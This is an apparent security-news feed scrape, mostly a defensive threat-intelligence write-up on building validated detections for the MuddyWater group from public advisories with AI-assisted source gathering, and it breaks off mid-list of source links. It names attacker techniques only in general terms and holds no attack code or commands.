<span data-contrast="auto">The acknowledgment highlights the role that responsible <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28624">vulnerability</a> disclosure can play in improving cybersecurity standards for public examination systems.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="3"><b><span data-contrast="none">How the New CBSE-Controlled Re-Evaluation Portal Operates</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Following the migration to CBSE servers and the completion of the CBSE cybersecurity clearance process, the updated re-evaluation portal will function through a fully digital workflow.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Under the revised system:</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<ul>
 	<li><span data-contrast="auto">Examiners can access only the specific questions that have been flagged by students for re-evaluation rather than the complete answer book.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><span data-contrast="auto">Access is provided through CBSE-issued tablets.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><span data-contrast="auto">Marks are awarded according to CBSE’s original marking scheme.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
 	<li><span data-contrast="auto">Every action within the process is digitally recorded, creating comprehensive audit trails.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":0,"335559739":0}'> </span></li>
</ul>
<span data-contrast="auto">Officials believe these measures will help improve transparency, accountability, and security during the reassessment process.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[B&H is blowing out MacBook Air inventory at $899 with WWDC Deal Zone]]></title>
<description><![CDATA[Today only, pick up a 13-inch MacBook Air with a 10-core GPU for $899 during B&H's WWDC Deal Zone event.Grab a MacBook Air with a 10-core GPU for $899 today only - Image credit: AppleBoth Apple's Sky Blue and Midnight colorways are marked down to $899 this Monday, a discount of $300 off the origi...]]></description>
<link>https://tsecurity.de/de/3580618/ios-mac-os/bh-is-blowing-out-macbook-air-inventory-at-899-with-wwdc-deal-zone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580618/ios-mac-os/bh-is-blowing-out-macbook-air-inventory-at-899-with-wwdc-deal-zone/</guid>
<pubDate>Mon, 08 Jun 2026 08:47:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Today only, pick up a 13-inch MacBook Air with a 10-core GPU for $899 during B&amp;H's WWDC Deal Zone event.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67863-143037-macbook-air-10-core-gpu-899-deal-xl.jpg" alt="Open MacBook Air in Midnight color with abstract blue screen pattern, bold white text overlaid reading MACBOOK AIR 10C GPU 899 dollars, against colorful blurred background" height="720"><br><span>Grab a MacBook Air with a 10-core GPU for $899 today only - Image credit: Apple</span></div><br>Both Apple's <a href="https://www.bhphotovideo.com/c/product/1883953-REG/apple_mc6u4ll_a_13_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-13in-m4-899-dz-060826" rel="nofollow" target="_blank">Sky Blue</a> and <a href="https://bhphotovideo.com/c/product/1883963-REG/apple_mw133ll_a_13_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-13in-m4-899-dz-060826" rel="nofollow" target="_blank">Midnight</a> colorways are marked down to $899 this Monday, a discount of $300 off the original MSRP for the closeout M4 model.<br><br><a href="https://www.bhphotovideo.com/c/product/1883963-REG/apple_mw133ll_a_13_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-13in-m4-899-dz-btn-060826" rel="nofollow" class="deal-highlight">Buy M4 13" MacBook Air for $899</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/08/bh-is-blowing-out-macbook-air-inventory-at-899-with-wwdc-deal-zone?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244559?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana]]></title>
<description><![CDATA[11 validated detections from public sources, OpenCTI graph, and a one-command labTable of ContentsMost threat actor writeups stop too early. They describe the group, list ATT&CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: what do I actually do with th...]]></description>
<link>https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580441/hacking/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:19 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>11 validated detections from public sources, OpenCTI graph, and a one-command lab</em>Table of Contents</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HvRb4_s15JQ6FkA9ng-8w.png"></figure><p>Most threat actor writeups stop too early. They describe the group, list ATT&amp;CK techniques, and paste some IoCs. Then the report sits in a folder while defenders wonder: <em>what do I actually do with this on Monday?</em></p><p>Operation Desert Hydra is an answer to that question.</p><p>This article documents a full CTI-to-detection pipeline focused on <strong>MuddyWater</strong> — an Iranian state-linked actor (MOIS) that has been targeting Israeli government, defense, and critical infrastructure organizations since at least 2019. By the end, you’ll have 11 detection records, 12 Kibana proof screenshots, and a working lab you can deploy with a single command.</p><p>Everything is on my GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra">github.com/anpa1200/operation-desert-hydra</a></p><p><a href="https://github.com/anpa1200/operation-desert-hydra">GitHub - anpa1200/operation-desert-hydra: OpenCTI-based CTI-to-Detection Knowledge Graph for Iranian activity against Israeli organizations</a></p><ol><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#86dc"><strong>Why MuddyWater?</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#aadd"><strong>The Pipeline</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c6f3"><strong>Phase 1: Source Gathering</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#205e"><strong>Phase 2: Procedure Dataset</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#fb48"><strong>Phase 3: OpenCTI Knowledge Graph</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#c2e1"><strong>Phase 4: Detection Atlas</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8ce1"><strong>Phase 5: Validation Lab</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#0a42"><strong>Validation Results Summary</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#8cf4"><strong>Phase 6: Coverage Matrix</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dfaa"><strong>What Defenders Should Do Right Now</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#b8cc"><strong>Reproduce It Yourself</strong></a></li><li><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0#dbb0"><strong>Production Scars</strong></a></li></ol><h3>Why MuddyWater?</h3><p>Three reasons:</p><ol><li><strong>Rich public reporting.</strong> CISA, Israel’s INCD, ClearSky, Deep Instinct, Mandiant, and Proofpoint have all published detailed technical analysis. This gives enough procedure-level specificity to engineer real detections.</li><li><strong>Consistent playbook.</strong> Across five years of reporting, the same pattern recurs: spearphishing → scripting engine → encoded PowerShell → RMM tool. The consistency makes it detectable.</li><li><strong>Relevant geography.</strong> The actor consistently targets Israeli organizations — a geography with high analytical value and underserved public detection coverage.</li></ol><h3>The Pipeline</h3><p>The project enforces a chain from source to Kibana screenshot:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NDsnhzE7S-lzy0fSIOZrsw.png"></figure><pre>source → claim → procedure → ATT&amp;CK mapping → telemetry requirement<br>  → detection pseudologic → benign simulation → lab result → coverage score</pre><p>No step is skipped. Every claim has a source. Every detection has a validation case. Every PASS has a screenshot.</p><h3>Phase 1: Source Gathering</h3><p>The first step is source discovery, not detection writing.</p><h4>Traditional Source Gathering — and Why It’s Not Enough Alone</h4><p>The standard workflow for CTI source gathering looks like this: run keyword searches (Google, Google Dorks, site: operators for known vendor blogs), check your Threat Intelligence Platform for existing reports on the actor, subscribe to vendor RSS feeds, pull ISAC/ISAO advisories, and query your organization’s TIP for any existing indicator sets or finished intelligence reports tagged to the actor.</p><p>For a mature, well-documented actor like MuddyWater this gets you to maybe 15–20 well-known sources quickly — the CISA advisory, the MITRE ATT&amp;CK page, two or three vendor blog posts you already knew about. The problem is coverage holes: you’ll reliably find sources that are already in your network’s vocabulary and miss the ones that aren’t. A CERT-IL PDF published in Hebrew and linked only from a government portal, a Group-IB campaign teardown behind a partial paywall, or a 2020 ClearSky report that predates your current TIP subscription window — all of these can fall out of a manual search pass.</p><p>TIPs compound this in a specific way: they surface what has already been ingested and tagged. If a source was never promoted into your TIP (because it was published before the subscription started, or because no analyst had time to import it), it is invisible inside the platform. The TIP is authoritative for what it knows, not for the universe of available sources.</p><h4>AI research</h4><p>The parallel AI research pass was not a replacement for traditional gathering — it was a coverage supplement. After both approaches ran, the traditional pass and the AI outputs were merged into the same deduplication step. The AI outputs added approximately 40 sources beyond what a manual search surfaced; traditional search added discipline about sources the models hallucinated (fabricated URLs, mis-attributed PDFs). Neither was sufficient alone.</p><p>I ran parallel deep-research passes using Gemini and OpenAI, both given the same prompt. Each returned a candidate source register. Both outputs were compared, deduplicated (71 candidates → 8 promoted), and the surviving sources were manually acquired and reviewed before anything entered the dataset.</p><h4>The Actual Prompt</h4><p>This is the exact prompt used — both models received it verbatim:</p><pre>You are a senior CTI researcher and source-validation analyst. For Operation Desert Hydra,<br>gather the best public sources on MuddyWater / Seedworm / Mango Sandstorm / TA450 and<br>related Iranian activity against Israeli organizations. Goal: create a source register for<br>an OpenCTI-based CTI-to-detection knowledge graph:<br>Source → Actor → Campaign → Procedure → ATT&amp;CK Technique → Observable → Log Source<br>→ Detection → Validation → Coverage.<br>Search MITRE ATT&amp;CK, CISA/FBI/NSA, Israel National Cyber Directorate, Microsoft,<br>Google/Mandiant, ESET, Check Point, ClearSky, Unit 42, Proofpoint, SentinelOne,<br>Recorded Future, Symantec, Talos, Trend Micro, Kaspersky, Cloudflare/Hunt.io/DomainTools,<br>GitHub, and academic sources.<br>Include secondary comparison actors only as comparison: APT34, APT35/Charming Kitten/Mint<br>Sandstorm, CyberAv3ngers, Agrius. Do not merge actors unless a source explicitly supports<br>overlap.<br>For every source, return this YAML structure:<br>  id, title, publisher, url, direct_download_url, download_type, publication_date,<br>  access_date, actor_claims, source_type, reliability, relevance flags for<br>  actor_profile/procedures/malware/infrastructure/detections/validation_lab/opencti_modeling,<br>  key_entities, key_attck_techniques, source_summary, use_for_project, limitations.<br>Provide direct PDF/STIX/JSON/CSV/GitHub raw links where available; if unavailable write<br>direct_download_url: none_found. Do not invent URLs or dates.<br>Use evidence labels:<br>  Observed = directly shown in telemetry/sample/log/screenshot/source artifact<br>  Reported = stated by source<br>  Assessed = source judgment<br>  Inferred = analyst conclusion from multiple cited facts<br>  Gap = unknown or not proven<br>Do not upgrade source claims, do not treat ATT&amp;CK mapping as attribution evidence, do not<br>treat shared tooling as actor identity proof, and do not claim detection coverage without<br>validation.<br>Search exact terms including:<br>  MuddyWater Iran MOIS, MuddyWater Seedworm, MuddyWater Mango Sandstorm,<br>  MuddyWater TA450, MuddyWater POWERSTATS, PowGoop, MuddyViper, MuddyWater Israel,<br>  Israeli organizations, PowerShell, RMM, phishing, spearphishing, Exchange CVE-2020-0688,<br>  CVE-2017-0199, MITRE ATT&amp;CK, CISA FBI NSA advisory, Mango Sandstorm Microsoft,<br>  TA450 Proofpoint, Seedworm Symantec, ESET, ClearSky, Unit 42, Check Point, Mandiant,<br>  SentinelOne, Recorded Future, Talos, Trend Micro, Kaspersky;<br>  also: APT34 Israel, APT35 Israel, Mint Sandstorm Israel, CyberAv3ngers Israel,<br>  Agrius Israel, Iranian threat actors Israeli organizations.<br>Output only these sections:<br>  1) Executive Source Assessment<br>  2) High-Priority Source Register with 10-20 best sources in YAML<br>  3) Extended Source Register<br>  4) Direct Downloads Table<br>  5) Actor Alias / Overlap Notes<br>  6) Procedure Extraction Candidates grouped by tactic with source_ids, evidence_label,<br>     ATT&amp;CK candidate, required telemetry, detection opportunity, validation_possible<br>  7) OpenCTI Modeling Candidates<br>  8) Detection Engineering Opportunities marked candidate only<br>  9) Gaps And Manual Review Items<br>The final output must be usable to seed data/sources.yaml, data/procedures.yaml,<br>docs methodology, OpenCTI import plan, and detection atlas.</pre><h4>What the Prompt Is Designed to Do</h4><p>A few decisions worth explaining:</p><p><strong>Output schema in the prompt.</strong> Asking for a specific YAML field list (id, title, publisher, url, direct_download_url…) forces the model to either produce usable data or leave a visible blank — no vague summaries. direct_download_url: none_found is the required answer when a URL doesn't exist, which prevents the model from inventing one.</p><p><strong>Evidence labels baked in.</strong> The five labels (Observed / Reported / Assessed / Inferred / Gap) are defined in the prompt so the model applies them consistently and the output is ready to feed directly into data/procedures.yaml without reformatting.</p><p><strong>Explicit anti-hallucination rules.</strong> “Do not invent URLs or dates.” “Do not upgrade source claims.” “Do not treat ATT&amp;CK mapping as attribution evidence.” These are not just principles — they are instructions the model can fail visibly on, which makes QA faster.</p><p><strong>Parallel models, same prompt.</strong> Running Gemini and OpenAI on the same prompt and comparing outputs catches source fabrications: if one model lists a URL the other doesn’t, that URL gets verified before it enters the register. Two models that agree independently on a source add confidence; one model alone that lists something unusual is a flag.</p><h4>The Review Gate</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*p--8CFcThnLuDmZiNyOdQg.png"></figure><p>Every source that came out of the AI output went through this checklist before being promoted into data/sources.yaml:</p><ul><li>Is the URL real and accessible?</li><li>Is the publication date accurate?</li><li>Does the content actually describe MuddyWater procedures (not just mention the name)?</li><li>Is there at least one procedure-level claim (not just “actor uses PowerShell”)?</li><li>Is the actor identification explicit or inferred from shared tooling only?</li></ul><p>71 candidates → 8 government/vendor sources promoted. The rest were duplicates, secondary summaries, or sources that named the actor without procedure-level specificity.</p><h4>Research Artifacts (All in the Repo)</h4><p>Every file from the source gathering workflow is version-controlled and publicly accessible:</p><ul><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/Gemini-research.md"><strong>Gemini-research.md</strong></a> — Raw Gemini deep-research output: candidate source register in YAML, procedure extraction candidates, OpenCTI modeling candidates, detection opportunities, gaps.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/openAI-research.md"><strong>openAI-research.md</strong></a> — Raw OpenAI deep-research output: executive assessment, high-priority sources, extended source register, direct download list, actor alias notes.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/relevant-research-list.md"><strong>relevant-research-list.md</strong></a> — Deduplicated candidate list after comparing both model outputs: 71 sources, acquisition targets for Step 5.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-acquisition-report.md"><strong>source-acquisition-report.md</strong></a> — Results of the automated fetch run: HTTP status, content type, file size, and extraction status for all 71 sources.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/docs/source-gathering/source-reliability-evidence-assessment.md"><strong>source-reliability-evidence-assessment.md</strong></a> — Analyst review notes: reliability ratings, evidence quality, promotion decisions, and limitations per source.</li><li><a href="https://github.com/anpa1200/operation-desert-hydra/tree/main/docs/source-gathering/raw-sources"><strong>raw-sources/</strong></a> — 71 numbered source folders, each containing metadata.json, headers.txt, the raw source file, extracted source.txt, and fallback reader output.</li></ul><h4><strong>Promoted sources (highest weight):</strong></h4><ul><li><strong>CISA AA22–055A (Feb 2022)</strong> — Full procedure survey: PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin; WMI survey script; credential dumping tools.</li><li><strong>INCD 2023</strong> — Israeli campaign specifics: ScreenConnect/SimpleHelp RMM abuse, Egnyte/OneDrive lures, Log4j + Exchange exploitation.</li><li><strong>INCD 2024</strong> — BugSleep analysis: 43-minute scheduled task beacon, VPN exploitation, new RMM tools (Level, PDQConnect).</li></ul><p>Supporting vendor sources: ClearSky, Deep Instinct, Group-IB, Mandiant, Proofpoint, Sekoia.io, Symantec.</p><h4>Why These Three Have the Highest Weight</h4><p>The reliability assessment used a two-axis rubric: <strong>Source Reliability (A–F)</strong> separating publication discipline from content, and <strong>Information Credibility (1–6)</strong> rating how well each claim is grounded.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*672ETgk4DFDJDE0G2-sLgA.png"></figure><p><strong>CISA AA22–055A — Reliability A, Credibility 2</strong></p><p>This is a joint advisory signed by five national authorities: CISA, FBI, CNMF, NCSC-UK, and NSA. That multi-agency co-signature is not ceremonial — each agency must independently agree to the technical content before it publishes. The advisory names specific malware families (PowGoop, POWERSTATS, Small Sieve, Mori, Canopy, Marlin), includes an actual WMI PowerShell survey script attributed to MuddyWater, and lists credential-dumping tool names. Evidence label: Reported / Assessed. The PDF acquired locally at raw-sources/07-u-s-cyber-command-defense-media-aa22-055a-pdf-mirror/source.pdf is the authoritative copy distributed via Defense Media Activity. Credibility is 2, not 1, because the advisory states TTPs based on intelligence assessment rather than a single intercepted artifact — but the authority behind that assessment is as high as public-source CTI gets.</p><p><strong>INCD 2023 (MuddyWater / DarkBit PDF) — Reliability A, Credibility 2</strong></p><p>The Israel National Cyber Directorate is the government authority responsible for civilian cyber defense in Israel, the primary target country for this actor. This report covers a specific Israeli campaign including: tool names (ScreenConnect, SimpleHelp), file-sharing lure services (Egnyte, OneDrive), exploitation of Log4j and Exchange CVE-2020–0688, and deployment of ransomware (DarkBit) as a cover operation. Evidence label: Observed / Reported / Assessed. The "Observed" label means the INCD had direct visibility into the incident — not a secondary summary. This gives procedure-level specificity that generic vendor threat intel doesn't reach. Acquired at raw-sources/17-israel-national-cyber-directorate-muddywater-darkbit-pdf/source.pdf.</p><p><strong>INCD 2024 (BugSleep PDF) — Reliability A, Credibility 2</strong></p><p>Same publisher authority as INCD 2023, focused on MuddyWater’s 2024 evolution. Key content: BugSleep backdoor analysis, the specific 43-minute scheduled task beacon interval (which became proc_mw_0006 and det_mw_0006), VPN exploitation, and new RMM tools (Level, PDQConnect). The 43-minute interval is a concrete behavioral fingerprint — not a general TTP category — and it came from direct INCD analysis. Evidence label: Observed / Reported / Assessed. Acquired at raw-sources/18-israel-national-cyber-directorate-technological-advancement-and-evolution-of-muddywater-in/source.pdf.</p><p>The three sources share a common characteristic: they are not secondary aggregators or vendor marketing. They are government authorities with direct incident visibility reporting on specific Israeli campaigns.</p><h4>Steps After Deduplication: What Actually Happened to All 71 Sources</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XeokisYTU_DGw6UH7bLB3w.png"></figure><p>After the AI outputs were merged and deduplicated, 71 candidate sources remained. Here is what happened to them across Steps 5–9:</p><p><strong>Step 5 — Automated Acquisition</strong></p><p>tools/fetch_research_sources.py ran against all 71 URLs. For each source it created a numbered folder under docs/source-gathering/raw-sources/ with:</p><pre>raw-sources/<br>  01-mitre-att-ck-muddywater-g0069/<br>    metadata.json        # URL, fetch timestamp, HTTP status, content-type, size<br>    headers.txt          # Raw HTTP response headers<br>    source.html / source.pdf / source.txt   # Primary file<br>    source.txt           # Text extract (for PDFs and HTML)<br>    fallback-reader.txt  # Reader-mode fallback if primary was blocked or JS-rendered</pre><p>Not all fetches succeeded. Some sources returned 403 (vendor gating), some required JS rendering (only fallback text was captured), and two PDFs were corrupted. The acquisition report at docs/source-gathering/source-acquisition-report.md records the HTTP status, file size, and extraction status for all 71.</p><p><strong>Step 6 — Reliability and Credibility Rating</strong></p><p>Each acquired source was rated using the two-axis rubric. The full assessment table is in docs/source-gathering/source-reliability-evidence-assessment.md. Outcome breakdown:</p><ul><li>Reliability A (government / primary standard): 23 sources</li><li>Reliability B (usually reliable vendor / research publisher): 25 sources</li><li>Reliability C (secondary / news / marketing): 18 sources</li><li>Reliability F (failed acquisition or cannot judge): 5 sources</li></ul><p><strong>Step 7 — Promotion Decision</strong></p><p>Only sources with a combination of Reliability A or B, Credibility 2 or better, a usable acquisition, and at least one procedure-level claim were promoted into data/sources.yaml. The rest were assigned one of: Use as corroboration, Use as comparison only, Defer, or Exclude.</p><p>71 candidates → 8 primary sources promoted into the dataset. The 63 that were not promoted are retained in raw-sources/ for future work; they are not discarded.</p><p><strong>Step 8 — Claim Extraction</strong></p><p>For each promoted source, specific claims were extracted with source binding and evidence labels. A claim is not “MuddyWater uses PowerShell” — it is: “CISA AA22–055A (AA22–055A PDF, p.4) reports that MuddyWater actors deploy PowGoop, a DLL loader that decrypts and executes a PowerShell backdoor (Reported)." This source-bound format prevents claim drift downstream.</p><p><strong>Step 9 — Procedure Candidate Extraction</strong></p><p>From the bound claims, 10 procedure candidates were grouped by tactic: Initial Access, Execution, Persistence, Defense Evasion, Discovery, C2, Credential Access. Each candidate recorded: required telemetry, detection opportunity, whether lab validation was feasible, and whether the procedure appeared in multiple independent sources (a promotion signal for higher confidence scores later).</p><h4>The Full 71-Source Candidate List</h4><p>This is the deduplicated list produced after comparing Gemini and OpenAI outputs. Every source here was an acquisition target for Step 5.</p><p><strong>Core MuddyWater / Seedworm / TA450 / Mango Sandstorm</strong></p><ol><li><a href="https://attack.mitre.org/groups/G0069/">MITRE ATT&amp;CK — MuddyWater G0069</a></li><li><a href="https://attack.mitre.org/software/S0223/">MITRE ATT&amp;CK — POWERSTATS S0223</a></li><li><a href="https://attack.mitre.org/software/S1046/">MITRE ATT&amp;CK — PowGoop S1046</a></li><li><a href="https://www.cisa.gov/news-events/alerts/2022/02/24/iranian-government-sponsored-muddywater-actors-conducting-malicious">CISA alert — Iranian Government-Sponsored MuddyWater Actors Conducting Malicious Cyber Operations</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A advisory page</a></li><li><a href="https://www.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDF</a></li><li><a href="https://media.defense.gov/2022/Feb/24/2002944274/-1/-1/0/CSA_AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.PDF">U.S. Cyber Command / Defense media — AA22–055A PDF mirror</a></li><li><a href="https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage">NCSC-UK — Joint advisory on MuddyWater actor</a></li><li><a href="https://www.iranwatch.org/sites/default/files/cybercom_muddywater_press_release.pdf">U.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDF</a></li><li><a href="https://duo.com/decipher/us-cyber-command-discloses-muddywater-malware-samples">Decipher — US Cyber Command Discloses MuddyWater Malware Samples</a></li><li><a href="https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/">SentinelOne — Wading Through Muddy Waters</a></li><li><a href="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">Palo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle East</a></li><li><a href="https://radar.certfa.com/en/insights/cluster/fe272810/">CERTFA Radar — MuddyWater Threat Actor Cluster</a></li><li><a href="https://radar.certfa.com/en/threats/view/d7c9c420/">CERTFA Radar — MuddyWater / Earth Vetala Intrusion</a></li><li><a href="https://www.group-ib.com/masked-actors/muddywater/">Group-IB — MuddyWater APT Group Profile</a></li></ol><p><strong>Israel-Focused MuddyWater Sources</strong></p><ol><li><a href="https://www.gov.il/en/pages/_muddywater">Israel National Cyber Directorate — MuddyWater page</a></li><li><a href="https://www.gov.il/BlobFolder/news/_muddywater/en/government%20threat%20actor.pdf">Israel National Cyber Directorate — MuddyWater / DarkBit PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf">Israel National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/alert_1947/he/ALERT-CERT-IL-W-1947.pdf">Israel National Cyber Directorate — Overview of Recent Phishing PDF</a></li><li><a href="https://www.clearskysec.com/operation-quicksand/">ClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli Organizations</a></li><li><a href="https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf">ClearSky — Operation Quicksand PDF</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/">Microsoft — MERCURY and DEV-1084: Destructive attack on hybrid environment</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">Microsoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizations</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign">Proofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest Campaign</a></li><li><a href="https://harfanglab.io/insidethelab/muddywater-rmm-campaign/">HarfangLab — MuddyWater campaign abusing Atera Agents</a></li><li><a href="https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework">Deep Instinct — DarkBeatC2: The Latest MuddyWater Attack Framework</a></li><li><a href="https://www.scworld.com/brief/novel-c2-tool-leveraged-in-latest-muddywater-attacks">SC Media — Novel C2 tool leveraged in latest MuddyWater attacks</a></li><li><a href="https://blog.checkpoint.com/research/muddywater-threat-group-deploys-new-bugsleep-backdoor/">Check Point — MuddyWater Threat Group Deploys New BugSleep Backdoor</a></li><li><a href="https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/">ESET / WeLiveSecurity — MuddyWater: Snakes by the riverbank</a></li><li><a href="https://www.eset.com/uk/about/newsroom/press-releases/iran-muddywater-critical-infrastructure-israel-egypt-snake-game-eset-research-uk/">ESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and Egypt</a></li><li><a href="https://securityaffairs.com/185244/apt/muddywater-strikes-israel-with-advanced-muddyviper-malware.html">Security Affairs — MuddyWater strikes Israel with advanced MuddyViper malware</a></li><li><a href="https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html">The Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks</a></li></ol><p><strong>Recent / Evolving MuddyWater Activity</strong></p><ol><li><a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix">Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/crossed-wires-case-study-iranian-espionage-and-attribution">Proofpoint — Crossed Wires: a case study of Iranian espionage and attribution</a></li><li><a href="https://www.group-ib.com/blog/muddywater-operation-olalampo/">Group-IB — Operation Olalampo: Inside MuddyWater’s Latest Campaign</a></li><li><a href="https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html">The Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP</a></li><li><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/">Rapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware</a></li><li><a href="https://thehackernews.com/2026/05/muddywater-uses-microsoft-teams-to.html">The Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack</a></li><li><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/">Rapid7 — Iran Conflict Cyber Threat Intelligence</a></li><li><a href="https://www.extrahop.com/blog/the-digital-front-of-iranian-cyber-offensive-and-defensive-response">ExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive Response</a></li><li><a href="https://abnormal.ai/blog/iran-aligned-cyber-operations-email-threats">Abnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel Strikes</a></li><li><a href="https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/">Unit 42 — Boggy Serpens Threat Assessment</a></li><li><a href="https://hivepro.com/threat-advisory/muddywater-irans-adaptive-cyber-espionage-machine/">Hive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage Machine</a></li><li><a href="https://hivepro.com/wp-content/uploads/2026/03/TA2026082.pdf">Hive Pro — MuddyWater / Operation Olalampo PDF</a></li><li><a 